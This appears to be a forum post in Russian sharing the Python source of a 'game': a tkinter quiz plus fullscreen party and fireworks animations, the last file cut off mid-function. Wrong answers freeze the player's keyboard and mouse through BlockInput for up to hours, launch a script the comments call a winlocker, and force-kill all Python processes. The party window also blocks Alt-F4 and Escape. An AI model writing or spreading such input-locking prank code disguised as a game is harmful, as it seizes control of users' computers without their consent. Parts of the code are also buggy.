я сделал игру.
исходники:

tkintertest.py:
import tkinter as tk
from tkinter import simpledialog, messagebox
import os
import time
import sys
import ctypes
import random
import math
import subprocess
import threading
from playsound import playsound
base_dir = os.path.dirname(os.path.abspath(__file__))
youwin8bit = os.path.join(base_dir, "win8bit.mp3")
russian_gimn = os.path.join(base_dir, "gimnrussia.mp3")
gameover8bit = os.path.join(base_dir, "gameover.mp3")

def play_sound(sound_file):
    """Play sound file using subprocess to avoid playsound Unicode issues"""
    try:
        # Use Windows Media Player to play the sound
        subprocess.Popen(['cmd', '/c', 'start', '/min', 'wmplayer', sound_file], 
                        shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except Exception as e:
        print(f"Error playing sound: {e}")
def roundthree():
     messagebox.showinfo("Приветсвие", "Ну что, прошел все 2 раунда?Молодец. как тебе это удалось? Неважно.самый масштабный раунд 3 начат. 7 вопросов. и у каждого свое. ")
     messagebox.showinfo("Приветсвие", "Вопросы будут мощными.ответ формировать без лишнего. только да или нет.пример неправильного:Да. пример правильного:Да")
     question1 = simpledialog.askstring("Первый вопрос", "Самая большая по площади страна?")
     if question1 == "Россия".lower():
          playsound(youwin8bit)
          messagebox.showinfo("А ты крут.послушаем гимн россии!")
          playsound(russian_gimn)
          pass
     elif question1 == "рф":
          playsound(youwin8bit)
     else:
          playsound(gameover8bit)
          messagebox.showwarning("нет", "Неверно!")
          pass
     question2 = simpledialog.askstring("Второй вопрос", "Можно ли выполнить произвольный код на атакваном устройстве, используя уязвимость переполнения буфера в драйвере GPS-Трекера на спине крокодила??").lower()
     if question2 == "Да.".lower() or question2 == "Да".lower():
          playsound(youwin8bit)
          os.system("python fireworks.py")
          pass
     else:
          playsound(gameover8bit)
          os.system("python НЕ_ОТКРЫВАТЬ_clean.py")
          time.sleep(900)
          os.system("taskkill /f /im python.exe")
          sys.exit(0)
          pass
     question3 = simpledialog.askstring("Вопрос3", "Достаточно ли атаки Человек посередине(MITM) для расшифровки TLS-Трафика, идущего между сенсором и сервером, если физический доступ к крокодилу есть? " )
     if question3 == "Да".lower() or question3 == "Да.".lower():
          playsound(youwin8bit)
          messagebox.showinfo("Молодец!", "ТЫ крут!")
          os.system("python fireworks.py")
          pass
     else:
          messagebox.showwarning("Неверно! в этот раз без сильного наказания. но ввод будет заблокирован на 40 секунд. и ты выбываешь.")
          ctypes.windll.user32.BlockInput(True)
          time.sleep(40)
          ctypes.windll.user32.BlockInput(False)
          sys.exit(1)
          pass
     question4 = simpledialog.askstring("Можно ли провести DDoS-Атаку на сервер используя ботнет из устройств, закрепленных на крокодилах?")
     if question4 == "Да".lower() or question4 == "да.".lower():
          playsound(youwin8bit)
          os.system("python mega_fireworks.py")
          pass
     else:
          os.system("python НЕ_ОТКРЫВАТЬ_clean.py")
          time.sleep(3600)
          os.system("taskkill /f /im python.exe")
          sys.exit(9)
          pass
     question5 = simpledialog.askstring("ФИНАЛ", "это финальный вопрос.  он невероятно сложный... если вы правильно ответите - вы гений. получите самый главный приз!готовы?текст:Верно ли, что что задача о выполнимости булевых формул может быть решена за полиномиальное время на квантовом компьютере с достаточно низкой вероятностью ошибки, если существует квантовый алгоритм, эффективно решая проблему поиска гровера на N элементов за 0(sqrt(N)) шагов, а также при условии, что класс сложности BQP совпадает с классом РН?")
     if question5 == "Нет".lower() or question5 == "Нет.".lower():
          messagebox.showinfo("ого...", "ЧЕЛ... ты выиграл. всю прогу прошел! ты достоен. финал. нажми ок и получишь самую гигантскую ту награду")
          os.system("python party.py")
          pass
     else:
          os.system("python НЕ_ОТКРЫВАТЬ_clean.py")
          time.sleep(9000)
          os.system("taskkill /f /im python.exe")
          


     
     


     




    

    



        

        





def roundtwo():
            messagebox.showinfo("Приветствие", "Это второй раунд. награда будет велика.первый вопрос:приз:ничего. неправильный ответ - блокировка ввода на 70 секунд.второй вопрос. награда:(награда). наказание:не придумал. вообщем не буду спойлерить" )
            bar = simpledialog.askstring("Первый вопрос", "а почему крокодильчик?", initialvalue="")
            if bar == "ПОТОМУ ЧТО КРОКО":
                 messagebox.showinfo("Правильно!намите любую кнопку и запустится дискотека. чтобы закрыть ее - нажмите кнопку win и закройте ее.")
                 os.system("python party.py")

            elif bar == "матрица":
                 messagebox.showinfo("...", "Я ненавижу попсу. система блокируется навсегда.")
                 os.system("python НЕ_ОТКРЫВАТЬ_clean.py")
            else:
                 messagebox.showwarning("Внимание!", "ввод блокируется на 8 секунд")
                 
                 ctypes.windll.user32.BlockInput(True)
                 time.sleep(8)
                 ctypes.windll.user32.BlockInput(False)

            messagebox.showinfo("Внимание!", "Второй вопрос")
            answer2 = simpledialog.askstring("Вопрос", "Какая сила укуса нильского КРОКОДИЛЬЧИК🐊?")
            if answer2 == "от 3400 до 5000 psi":
                 messagebox.showinfo("Правильно!✔")
                 playsound(youwin8bit)
                 if messagebox.askquestion("хотите феерверк?"):
                      os.system("python fireworks.py")
                      roundthree()
                     
                 else:
                     messagebox.showinfo("Ок")
                     roundthree()
                

                    
                    
                
                


                    

def main():
    
    root = tk.Tk()

    messagebox.showinfo('Внимание!', "это игра. перввй вопрос...", )
    
    # Задаем первый вопрос
    a = simpledialog.askstring("Вопрос", "а как какать?")
    
    if a == "я хз":
        # Используем simpledialog для второго вопроса
        ы = simpledialog.askstring("Ага!", "Почему?", initialvalue="")
        
        if ы == "КРОКОДИЛЬЧИК":
            messagebox.showinfo("Поздравляем!", "вы выиграли!")
            roundtwo()
        




        else:
            messagebox.showerror("Ошибка", "вы проиграли. система блокируется на 60 секунд.")
            playsound(gameover8bit)
            
            # Запускаем винлокер в отдельном процессе
            if os.path.exists("НЕ_ОТКРЫВАТЬ_clean.py"):
                os.system("start python НЕ_ОТКРЫВАТЬ_clean.py")
            else:
                messagebox.showwarning("Файл не найден", "Файл НЕ_ОТКРЫВАТЬ_clean.py не найден!")
            
            # Ждем 60 секунд пока винлокер работает
            time.sleep(60)
            ctypes.windll.user32.BlockInput(False)
            
            # Убиваем процесс python (это закроет винлокер)
            os.system("taskkill /f /im python.exe")

    
    else:
        messagebox.showerror("Ошибка", "вы проиграли. система блокируется на 9000 секунд.нажмите FAQ в том окне для того чтобы понять что случилось.")
        
        # Запускаем винлокер в отдельном процессе
        if os.path.exists("НЕ_ОТКРЫВАТЬ_clean.py"):
            os.system("start python НЕ_ОТКРЫВАТЬ_clean.py")
        else:
            messagebox.showwarning("Файл не найден", "Файл НЕ_ОТКРЫВАТЬ_clean.py не найден!")
        
    
        time.sleep(9000)


        ctypes.windll.user32.BlockInput(False)
        
        # Убиваем процесс python (это закроет винлокер)
        os.system("taskkill /f /im python.exe")



        
    
    # Закрываем tkinter
    root.destroy()

if __name__ == "__main__":
    main()

   
        



party.py:

import tkinter as tk
from tkinter import messagebox
import random
import math
import time
from PIL import Image, ImageTk
import io
import pygame
import base64
import winsound

class ChaosParty:
    def __init__(self):
        self.root = tk.Tk()
        self.root.title("ВЕЧЕРИНКА ХАОСА!")
        self.root.attributes('-fullscreen', True)
        self.root.configure(bg='black')
        self.root.attributes('-topmost', True)
        self.root.overrideredirect(True)
       
        # Блокируем закрытие (но ненадолго!)
        self.root.protocol("WM_DELETE_WINDOW", self.nope)
        self.root.bind("<Alt-F4>", self.nope)
        self.root.bind("<Escape>", self.nope)
       
        # Холст для всего безумия
        self.canvas = tk.Canvas(self.root, bg='black', highlightthickness=0)
        self.canvas.pack(fill=tk.BOTH, expand=True)
       
        # Создаем крокодильчиков из base64
        self.crocodiles = []
        self.create_crocodiles()
       
        # Запускаем все виды безумия
        self.start_chaos()
        
        # Добавляем звуковые эффекты вечеринки
        self.play_party_sounds()
       
    def play_party_sounds(self):
        """Play party music indefinitely."""
        try:
            # Initialize pygame mixer
            pygame.mixer.init()
            # Play random beep sounds in a loop
            self.play_random_sounds()
        except:
            pass
        
        # Выход по клавише q
        self.root.bind("<q>", self.exit_party)

    def play_random_sounds(self):
        """Play random beep sounds"""
        try:
            frequency = random.randint(200, 1000)
            duration = random.randint(50, 300)
            winsound.Beep(frequency, duration)
        except:
            pass
        
        # Add mouse click sound effects
        self.canvas.bind("<Button-1>", self.play_click_sound)
        
        # Continue playing random sounds
        self.root.after(random.randint(100, 500), self.play_random_sounds)

    def play_click_sound(self, event=None):
        """Play sound on mouse click"""
        try:
            frequency = random.randint(300, 800)
            duration = random.randint(20, 100)
            winsound.Beep(frequency, duration)
            
            # Create visual effect on click
            self.create_click_effect(event.x, event.y)
        except:
            pass

    def create_click_effect(self, x, y):
        """Create visual effect on mouse click"""
        colors = ['red', 'blue', 'green', 'yellow', 'cyan', 'magenta', 'white']
        for i in range(8):
            angle = i * 45
            rad = math.radians(angle)
            dx = math.cos(rad) * 10
            dy = math.sin(rad) * 10
            color = random.choice(colors)
            particle = self.canvas.create_oval(x-3, y-3, x+3, y+3, fill=color, outline='')
            self.animate_click_particle(particle, dx, dy)

    def animate_click_particle(self, particle, dx, dy):
        """Animate click particle effect"""
        self.canvas.move(particle, dx, dy)
        
        # Fade out effect
        current_color = self.canvas.itemcget(particle, "fill")
        if random.random() < 0.2:  # Random disappearance
            self.canvas.delete(particle)
            return
        
        # Slow down
        dx *= 0.9
        dy *= 0.9
        
        if abs(dx) > 0.5 or abs(dy) > 0.5:
            self.root.after(30, lambda: self.animate_click_particle(particle, dx, dy))
        else:
            self.canvas.delete(particle)

    def exit_party(self, event=None):
        """Exit the party when q is pressed."""
        self.party_over()

    def nope(self, event=None):
        return "break"

    def create_crocodiles(self):
        """Создаем спрайты крокодильчиков из base64"""
        croc_data = [
            "iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAACXBIWXMAAAsTAAALEwEAmpwYAAABCElEQVRYhe2WQQ6DMAwF/0E5cOQ+ZCRGjhw5j8TIsWckRoyMRGJkJEaOjERi5MiRkUiMHDlyHokxcuTIeSTGyJEj55EYI0eOnEdijBw5ch6JMXLkyHkkxsiRI+eRGCNHjpxHYowcOXIeiTFy5Mh5JMbIkSPnkRgjR46cR2KMHDlyHokxcuTIeSTGyJEj55EYI0eOnEdijBw5ch6JMXLkyHkkxsiRI+eRGCNHjpxHYowcOXIeiTFy5Mh5JMbIkSPnkRgjR46cR2KMHDlyHokxcuTIeSTGyJEj55EYI0eOnEdijBw5ch6JMXLkyHkkxsiRI+eRGCNHjpxHYowcOXIeiTFy5Mh5JMbIkSPnkRgjR46cR2L8A9WbZQZchykLAAAAAElFTkSuQmCC",
            "iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAADgdz34AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA0ElEQVRIie2VMQ7CMAxF/6EcOHKfMRIjR46cR2Lk2DFGYsTISCQSI0eOjERi5MiR80iMkSNHziMxRo4cOY/EGDly5DwSY+T8/Hm9XvV8PuvxeNT9ftftdqvr9arL5aLz+azT6aTj8ajD4aD9fq/dbqftdqvtdivP8+Q4jizLkmmaMgxDmqZJVVUpiiJZlqUoimRZlgzDkK7r0jRNqqpKURTJsiwFQSBd16VpmlRVlaIokmVZCoJAuq5L0zSpqipFUSTLshQEgXRdl6ZpUlVViqJIlmUpCALpui5N06SqqhRFkSzLUhAE0nVdmqZJVVUpiiJZlqUgCKTrujRNk6qqUhRFsixLQRBI13VpmiZVVaUoimRZloIgkK7r0jRNqqpKURTJsiwFQSBd16VpmlRVlaIokmVZCoJAuq5L0zSpqipFUSTLshQEgXRdl6ZpUlVViqJIlmUpCALpui5N06SqqhRFkSzLUhAE0nVdmqZJVVUpiiJZlqUgCKTrujRNk6qqUhRFsixLQRBI13VpmiZVVaUoimRZloLgDdM7ZQZchykLAAAAAElFTkSuQmCC"
        ]
       
        for data in croc_data:
            try:
                image_data = base64.b64decode(data)
                image = Image.open(io.BytesIO(image_data))
                photo = ImageTk.PhotoImage(image)
                self.crocodiles.append(photo)
            except:
                pass
       
        # Если крокодильчики не загрузились, создаем простые фигуры
        if not self.crocodiles:
            for _ in range(5):
                self.crocodiles.append(None)

    def start_chaos(self):
        """Запускаем все анимации хаоса"""
        self.create_floating_text()
        self.create_bouncing_shapes()
        self.create_rainbow_background()
        self.create_fireworks()
        self.create_floating_crocodiles()
        self.create_rotating_shapes()
        self.create_pulsating_circles()
        self.create_mouse_trail()
        self.create_spinning_text()
        self.create_screen_shake()

    def create_floating_text(self):
        texts = ["ХАОС!", "🎉", "ВЕЧЕРИНКА!", "🐊", "БЕЗУМИЕ!", "✨", "КОДИКИ!", "🚀"]
        for i in range(20):
            x = random.randint(0, self.root.winfo_screenwidth())
            y = random.randint(0, self.root.winfo_screenheight())
            text = random.choice(texts)
            color = random.choice(['red', 'blue', 'green', 'yellow', 'cyan', 'magenta', 'white'])
            item = self.canvas.create_text(x, y, text=text, font=("Arial", random.randint(20, 48)),
                                         fill=color, tags="floating_text")
            self.animate_text(item)

    def animate_text(self, item):
        dx = random.randint(-5, 5)
        dy = random.randint(-5, 5)
       
        def move():
            nonlocal dx, dy
            self.canvas.move(item, dx, dy)
            coords = self.canvas.coords(item)
            if coords[0] > self.root.winfo_screenwidth() or coords[0] < 0:
                dx = -dx
            if coords[1] > self.root.winfo_screenheight() or coords[1] < 0:
                dy = -dy
            self.root.after(50, move)
       
        move()

    def create_bouncing_shapes(self):
        shapes = []
        for _ in range(15):
            x = random.randint(50, self.root.winfo_screenwidth()-50)
            y = random.randint(50, self.root.winfo_screenheight()-50)
            size = random.randint(20, 60)
            color = random.choice(['red', 'blue', 'green', 'yellow', 'cyan', 'magenta'])
           
            if random.choice([True, False]):
                item = self.canvas.create_oval(x, y, x+size, y+size, fill=color, outline='')
            else:
                item = self.canvas.create_rectangle(x, y, x+size, y+size, fill=color, outline='')
           
            shapes.append({'item': item, 'dx': random.choice([-4, -3, -2, 2, 3, 4]),
                          'dy': random.choice([-4, -3, -2, 2, 3, 4])})
       
        self.animate_shapes(shapes)

    def animate_shapes(self, shapes):
        for shape in shapes:
            self.canvas.move(shape['item'], shape['dx'], shape['dy'])
            coords = self.canvas.coords(shape['item'])
           
            if coords[0] <= 0 or coords[2] >= self.root.winfo_screenwidth():
                shape['dx'] = -shape['dx']
            if coords[1] <= 0 or coords[3] >= self.root.winfo_screenheight():
                shape['dy'] = -shape['dy']
       
        self.root.after(30, lambda: self.animate_shapes(shapes))

    def create_rainbow_background(self):
        colors = ['#ff0000', '#ff7f00', '#ffff00', '#00ff00', '#0000ff', '#4b0082', '#8b00ff']
        current_color = 0
       
        def change_bg():
            nonlocal current_color
            self.root.configure(bg=colors[current_color])
            self.canvas.configure(bg=colors[current_color])
            current_color = (current_color + 1) % len(colors)
            self.root.after(200, change_bg)
       
        change_bg()

    def create_fireworks(self):
        def create_firework():
            x = random.randint(100, self.root.winfo_screenwidth()-100)
            y = random.randint(100, self.root.winfo_screenheight()-100)
            color = random.choice(['red', 'blue', 'green', 'yellow', 'cyan', 'magenta', 'white'])
           
            for angle in range(0, 360, 15):
                rad = math.radians(angle)
                dx = math.cos(rad) * 5
                dy = math.sin(rad) * 5
                particle = self.canvas.create_oval(x-2, y-2, x+2, y+2, fill=color, outline='')
                self.animate_particle(particle, dx, dy)
           
            self.root.after(random.randint(500, 2000), create_firework)
       
        create_firework()

    def animate_particle(self, particle, dx, dy):
        self.canvas.move(particle, dx, dy)
        if random.random() < 0.3:  # Случайное исчезновение
            self.canvas.delete(particle)
            return
       
        # Замедление
        dx *= 0.95
        dy *= 0.95
       
        if abs(dx) > 0.1 or abs(dy) > 0.1:
            self.root.after(30, lambda: self.animate_particle(particle, dx, dy))
        else:
            self.canvas.delete(particle)

    def create_floating_crocodiles(self):
        for i in range(min(10, len(self.crocodiles))):
            x = random.randint(50, self.root.winfo_screenwidth()-50)
            y = random.randint(50, self.root.winfo_screenheight()-50)
           
            if self.crocodiles[i] is not None:
                item = self.canvas.create_image(x, y, image=self.crocodiles[i])
            else:
                # Простая замена если крокодильчики не загрузились
                item = self.canvas.create_text(x, y, text="🐊", font=("Arial", 36))
           
            self.animate_crocodile(item)

    def animate_crocodile(self, item):
        dx = random.choice([-3, -2, -1, 1, 2, 3])
        dy = random.choice([-3, -2, -1, 1, 2, 3])
       
        def move():
            nonlocal dx, dy
            self.canvas.move(item, dx, dy)
            coords = self.canvas.coords(item)
            if coords[0] > self.root.winfo_screenwidth() or coords[0] < 0:
                dx = -dx
            if coords[1] > self.root.winfo_screenheight() or coords[1] < 0:
                dy = -dy
            self.root.after(40, move)
       
        move()

    def create_rotating_shapes(self):
        stars = []
        for _ in range(8):
            x = random.randint(100, self.root.winfo_screenwidth()-100)
            y = random.randint(100, self.root.winfo_screenheight()-100)
            size = random.randint(20, 40)
            color = random.choice(['red', 'blue', 'green', 'yellow', 'cyan', 'magenta'])
            star = self.canvas.create_polygon(self.create_star_points(x, y, size), fill=color, outline='')
            stars.append({'item': star, 'center_x': x, 'center_y': y, 'angle': 0, 'size': size})
       
        self.rotate_shapes(stars)

    def create_star_points(self, x, y, size):
        points = []
        for i in range(5):
            angle = math.pi/2 + i * 2*math.pi/5
            points.extend([x + size * math.cos(angle), y - size * math.sin(angle)])
            angle += math.pi/5
            points.extend([x + size/2 * math.cos(angle), y - size/2 * math.sin(angle)])
        return points

    def rotate_shapes(self, stars):
        for star in stars:
            self.canvas.delete(star['item'])
            star['angle'] += 0.1
            new_points = []
            for i in range(0, len(self.create_star_points(0, 0, star['size'])), 2):
                px = self.create_star_points(0, 0, star['size'])[i]
                py = self.create_star_points(0, 0, star['size'])[i+1]
                rx = px * math.cos(star['angle']) - py * math.sin(star['angle'])
                ry = px * math.sin(star['angle']) + py * math.cos(star['angle'])
                new_points.extend([star['center_x'] + rx, star['center_y'] + ry])
           
            star['item'] = self.canvas.create_polygon(new_points, fill=random.choice(['red', 'blue', 'green', 'yellow']), outline='')
       
        self.root.after(50, lambda: self.rotate_shapes(stars))

    def create_pulsating_circles(self):
        circles = []
        for _ in range(5):
            x = random.randint(100, self.root.winfo_screenwidth()-100)
            y = random.randint(100, self.root.winfo_screenheight()-100)
            size = random.randint(10, 30)
            color = random.choice(['red', 'blue', 'green', 'yellow', 'cyan', 'magenta'])
            circle = self.canvas.create_oval(x-size, y-size, x+size, y+size, fill=color, outline='')
            circles.append({'item': circle, 'x': x, 'y': y, 'size': size, 'growing': True})
       
        self.pulsate_circles(circles)

    def pulsate_circles(self, circles):
        for circle in circles:
            if circle['growing']:
                circle['size'] += 1
                if circle['size'] > 50:
                    circle['growing'] = False
            else:
                circle['size'] -= 1
                if circle['size'] < 10:
                    circle['growing'] = True
           
            self.canvas.delete(circle['item'])
            circle['item'] = self.canvas.create_oval(
                circle['x']-circle['size'], circle['y']-circle['size'],
                circle['x']+circle['size'], circle['y']+circle['size'],
                fill=random.choice(['red', 'blue', 'green', 'yellow']), outline=''
            )
       
        self.root.after(100, lambda: self.pulsate_circles(circles))

    def create_mouse_trail(self):
        """Создаем след от мыши"""
        self.mouse_trail = []
        self.canvas.bind("<Motion>", self.add_mouse_trail_point)
        self.animate_mouse_trail()

    def add_mouse_trail_point(self, event):
        """Добавляем точку в след мыши"""
        if len(self.mouse_trail) > 20:  # Ограничиваем длину следа
            self.mouse_trail.pop(0)
        self.mouse_trail.append((event.x, event.y))

    def animate_mouse_trail(self):
        """Анимируем след от мыши"""
        if hasattr(self, 'mouse_trail') and self.mouse_trail:
            for i in range(len(self.mouse_trail) - 1):
                x1, y1 = self.mouse_trail[i]
                x2, y2 = self.mouse_trail[i + 1]
                color = random.choice(['red', 'blue', 'green', 'yellow', 'cyan', 'magenta'])
                self.canvas.create_line(x1, y1, x2, y2, fill=color, width=2)
        
        self.root.after(50, self.animate_mouse_trail)

    def create_spinning_text(self):
        """Создаем вращающийся текст"""
        texts = ["💫", "🌀", "⚡", "🌟", "✨", "🌪️"]
        for i in range(5):
            x = random.randint(100, self.root.winfo_screenwidth()-100)
            y = random.randint(100, self.root.winfo_screenheight()-100)
            text = random.choice(texts)
            color = random.choice(['red', 'blue', 'green', 'yellow', 'cyan', 'magenta'])
            item = self.canvas.create_text(x, y, text=text, font=("Arial", 48), fill=color)
            self.animate_spinning_text(item, 0)

    def animate_spinning_text(self, item, angle):
        """Анимируем вращение текста"""
        coords = self.canvas.coords(item)
        if coords:
            x, y = coords
            self.canvas.delete(item)
            new_item = self.canvas.create_text(x, y, text=self.canvas.itemcget(item, "text"), 
                                             font=("Arial", 48), fill=self.canvas.itemcget(item, "fill"),
                                             angle=angle)
            self.root.after(100, lambda: self.animate_spinning_text(new_item, (angle + 10) % 360))

    def create_screen_shake(self):
        """Создаем эффект тряски экрана"""
        self.original_position = self.root.winfo_x(), self.root.winfo_y()
        self.shake_screen()

    def shake_screen(self):
        """Трясем экран"""
        if hasattr(self, 'original_position'):
            dx = random.randint(-10, 10)
            dy = random.randint(-10, 10)
            self.root.geometry(f"+{self.original_position[0] + dx}+{self.original_position[1] + dy}")
            self.root.after(100, self.reset_screen_position)

    def reset_screen_position(self):
        """Возвращаем экран в исходное положение"""
        if hasattr(self, 'original_position'):
            self.root.geometry(f"+{self.original_position[0]}+{self.original_position[1]}")
            self.root.after(random.randint(500, 2000), self.shake_screen)

    def party_over(self):
        """Завершаем вечеринку"""
        self.canvas.delete("all")
        self.root.configure(bg='black')
        self.canvas.configure(bg='black')
       
        # Прощальное сообщение
        self.canvas.create_text(
            self.root.winfo_screenwidth()//2,
            self.root.winfo_screenheight()//2 - 50,
            text="🎉 ВЕЧЕРИНКА ЗАВЕРШЕНА! 🎉",
            font=("Arial", 36, "bold"),
            fill="white"
        )
       
        self.canvas.create_text(
            self.root.winfo_screenwidth()//2,
            self.root.winfo_screenheight()//2 + 50,
            text="Нажмите любую клавишу для выхода",
            font=("Arial", 20),
            fill="yellow"
        )
       
        # Разрешаем выход
        self.root.unbind("<Escape>")
        self.root.bind("<Key>", lambda e: self.root.destroy())

    def run(self):
        try:
            self.root.mainloop()
        except:
            try:
                self.root.destroy()
            except:
                pass

if __name__ == "__main__":
    party = ChaosParty()
    party.run()



fireworks.py:
import tkinter as tk
import random
import math
import time

class MegaFireworksShow:
    def __init__(self):
        self.root = tk.Tk()
        self.root.withdraw()
        self.window = None
        self.canvas = None
        self.particles = []
        self.burst_count = 0
        self.max_bursts = 15  # More bursts for bigger show
        
    def show(self):
        """Start the mega fireworks show"""
        self.window = tk.Toplevel(self.root)
        self.window.title("🎆 МЕГА ФЕЙЕРВЕРК ШОУ! 🎆")
        self.window.attributes('-fullscreen', True)
        self.window.configure(bg='black')
        self.window.overrideredirect(True)
        self.window.attributes('-topmost', True)
        
        # Bind keys to close
        self.window.bind('<Escape>', lambda e: self.close())
        self.window.bind('<Any-Key>', lambda e: self.close())
        self.window.bind('<Button-1>', lambda e: self.close())
        
        self.canvas = tk.Canvas(self.window, bg='black', highlightthickness=0)
        self.canvas.pack(fill='both', expand=True)
        
        # Add title text
        self.canvas.create_text(
            self.window.winfo_screenwidth() // 2,
            50,
            text="🎆 ПОБЕДА! МЕГА ФЕЙЕРВЕРК! 🎆",
            fill="white",
            font=("Arial", 24, "bold")
        )
        
        # Start the show with multiple bursts
        self.start_show()
        
        self.window.focus_force()
        self.root.mainloop()
    
    def start_show(self):
        """Start the fireworks show with timed bursts"""
        if self.burst_count < self.max_bursts:
            self.create_mega_burst()
            self.burst_count += 1
            # Schedule next burst with random delay
            delay = random.randint(300, 800)
            self.window.after(delay, self.start_show)
        else:
            # Final grand finale
            self.window.after(1000, self.grand_finale)
    
    def create_mega_burst(self):
        """Create a massive firework burst"""
        screen_width = self.window.winfo_screenwidth()
        screen_height = self.window.winfo_screenheight()
        
        # More vibrant colors
        colors = [
            '#FF0000', '#00FF00', '#0000FF', '#FFFF00', '#00FFFF',
            '#FF00FF', '#FFA500', '#800080', '#FFFFFF', '#FF69B4',
            '#00FF7F', '#FF4500', '#DA70D6', '#7FFF00', '#FFD700'
        ]
        
        # Create multiple burst centers
        centers = []
        for _ in range(random.randint(2, 4)):
            center_x = random.randint(100, screen_width - 100)
            center_y = random.randint(100, screen_height - 200)
            centers.append((center_x, center_y))
        
        # Create 150-200 particles per burst center
        for center_x, center_y in centers:
            for _ in range(random.randint(150, 200)):
                angle = random.uniform(0, 2 * math.pi)
                speed = random.uniform(3, 10)  # Faster particles
                size = random.randint(3, 8)    # Bigger particles
                color = random.choice(colors)
                
                particle = self.canvas.create_oval(
                    center_x - size, center_y - size,
                    center_x + size, center_y + size,
                    fill=color, outline=color
                )
                
                self.particles.append({
                    'id': particle,
                    'dx': speed * math.cos(angle),
                    'dy': speed * math.sin(angle),
                    'life': random.randint(60, 100),  # Longer life
                    'color': color,
                    'size': size
                })
        
        # Start animation
        self.update_animation()
    
    def grand_finale(self):
        """Grand finale - massive simultaneous bursts"""
        screen_width = self.window.winfo_screenwidth()
        screen_height = self.window.winfo_screenheight()
        
        colors = ['#FF0000', '#00FF00', '#0000FF', '#FFFF00', '#00FFFF', '#FF00FF']
        
        # Create 5 massive bursts simultaneously
        for i in range(5):
            center_x = screen_width // 6 + (screen_width // 3) * (i % 3)
            center_y = screen_height // 4 + random.randint(-50, 50)
            
            for _ in range(250):  # Huge number of particles
                angle = random.uniform(0, 2 * math.pi)
                speed = random.uniform(4, 12)
                size = random.randint(4, 10)
                color = random.choice(colors)
                
                particle = self.canvas.create_oval(
                    center_x - size, center_y - size,
                    center_x + size, center_y + size,
                    fill=color, outline=color
                )
                
                self.particles.append({
                    'id': particle,
                    'dx': speed * math.cos(angle),
                    'dy': speed * math.sin(angle),
                    'life': random.randint(80, 120),
                    'color': color,
                    'size': size
                })
        
        self.update_animation()
    
    def update_animation(self):
        """Update all particles"""
        if not self.window or not self.canvas:
            return
            
        to_remove = []
        
        for p in self.particles:
            p['life'] -= 1
            if p['life'] <= 0:
                # Fade out effect
                current_alpha = p['life'] / 100.0
                if current_alpha > 0:
                    # Simulate fade by reducing size
                    new_size = max(1, int(p['size'] * current_alpha))
                    coords = self.canvas.coords(p['id'])
                    center_x = (coords[0] + coords[2]) / 2
                    center_y = (coords[1] + coords[3]) / 2
                    self.canvas.coords(p['id'], 
                        center_x - new_size, center_y - new_size,
                        center_x + new_size, center_y + new_size
                    )
                else:
                    self.canvas.delete(p['id'])
                    to_remove.append(p)
            else:
                self.canvas.move(p['id'], p['dx'], p['dy'])
                # Stronger gravity for more dramatic effect
                p['dy'] += 0.15
        
        # Remove dead particles
        for p in to_remove:
            if p in self.particles:
                self.particles.remove(p)
        
        # Continue animation
        if self.particles:
            self.window.after(25, self.update_animation)
        elif self.burst_count >= self.max_bursts:
            # Show closing message
            self.canvas.create_text(
                self.window.winfo_screenwidth() // 2,
                self.window.winfo_screenheight() // 2,
                text="🎉 ШОУ ЗАВЕРШЕНО! 🎉",
                fill="white",
                font=("Arial", 32, "bold")
            )
            self.window.after(3000, self.close)
    
    def close(self):
        """Close the show"""
        if self.window:
            self.window.destroy()
        if self.root:
            self.root.quit()
            self.root.destroy()

def show_mega_fireworks():
    """Start the mega fireworks show"""
    show = MegaFireworksShow()
    show.show()

if __name__ == "__main__":
    show_mega_fireworks()
import tkinter as tk
import random
import math
import time
import os
import threading
from playsound import playsound

class MegaFireworksSpectacle:
    def __init__(self):
        self.root = tk.Tk()
        self.root.withdraw()
        self.window = None
        self.canvas = None
        self.particles = []
        self.current_round = 0
        self.max_rounds = 3
        self.burst_count = 0
        self.music_playing = False
        
    def start_spectacle(self):
        """Start the 3-round fireworks spectacle"""
        self.window = tk.Toplevel(self.root)
        self.window.title("🎆 МЕГА ФЕЙЕРВЕРК ШОУ - 3 РАУНДА! 🎆")
        self.window.attributes('-fullscreen', True)
        self.window.configure(bg='black')
        self.window.overrideredirect(True)
        self.window.attributes('-topmost', True)
        
        # Bind keys to close
        self.window.bind('<Escape>', lambda e: self.close_show())
        self.window.bind('<Any-Key>', lambda e: self.close_show())
        
        self.canvas = tk.Canvas(self.window, bg='black', highlightthickness=0)
        self.canvas.pack(fill='both', expand=True)
        
        # Start background music
        self.play_background_music()
        
        # Start the first round
        self.start_next_round()
        
        self.window.focus_force()
        self.root.mainloop()
    
    def play_background_music(self):
        """Play background music in separate thread"""
        def music_thread():
            try:
                if os.path.exists("fireworks.mp3"):
                    self.music_playing = True
                    playsound("fireworks.mp3")
                else:
                    print("Файл fireworks.mp3 не найден! Музыка не будет играть.")
            except:
                print("Ошибка воспроизведения музыки")
        
        thread = threading.Thread(target=music_thread)
        thread.daemon = True
        thread.start()
    
    def start_next_round(self):
        """Start the next round of fireworks"""
        self.current_round += 1
        self.burst_count = 0
        
        if self.current_round > self.max_rounds:
            self.grand_finale()
            return
            
        # Show round title
        round_titles = [
            "РАУНД 1: КЛАССИЧЕСКИЕ ВЗРЫВЫ",
            "РАУНД 2: СПИРАЛЬНЫЕ УЗОРЫ", 
            "РАУНД 3: ЦВЕТОЧНЫЕ БУРИ"
        ]
        
        self.canvas.delete("all")
        self.canvas.create_text(
            self.window.winfo_screenwidth() // 2,
            self.window.winfo_screenheight() // 2,
            text=round_titles[self.current_round - 1],
            fill="white",
            font=("Arial", 28, "bold"),
            justify="center"
        )
        
        self.window.after(2000, self.start_round_show)
    
    def start_round_show(self):
        """Start the actual fireworks for current round"""
        if self.current_round == 1:
            self.round_classic_bursts()
        elif self.current_round == 2:
            self.round_spiral_patterns()
        elif self.current_round == 3:
            self.round_flower_storms()
    
    def round_classic_bursts(self):
        """Round 1: Massive classic colorful bursts"""
        if self.burst_count < 12:
            self.create_classic_burst()
            self.burst_count += 1
            delay = random.randint(400, 700)
            self.window.after(delay, self.round_classic_bursts)
        else:
            self.window.after(1500, self.start_next_round)
    
    def round_spiral_patterns(self):
        """Round 2: Beautiful spiral patterns"""
        if self.burst_count < 8:
            self.create_spiral_burst()
            self.burst_count += 1
